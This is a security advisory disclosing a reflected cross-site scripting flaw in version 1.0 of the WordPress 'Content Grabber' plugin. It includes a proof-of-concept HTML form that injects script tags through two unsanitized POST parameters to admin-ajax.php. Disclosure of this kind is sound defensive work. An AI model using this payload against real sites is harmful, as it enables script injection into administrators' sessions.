Title: WordPress 'Content Grabber' Plugin Version: 1.0 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-14 Download: - https://wordpress.org/plugins/content-grabber/ - https://plugins.svn.wordpress.org/content-grabber/ Notified WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== A plugin to help you grab content of any post type and display them as you want ## Vulnerabilities ========================================================== Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed. PoC: Log in as admin and submit the following request: <form method="POST" action="[URL]/wp-admin/admin-ajax.php"> <input type="text" name="action" value="get_terms_taxonomies"><br /> <input type="text" name="post_type" value="post" ><br /> <input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>" ><br /> <input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>" ><br /> <input type="text" name="cat_id_array" value="["1"]" ><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.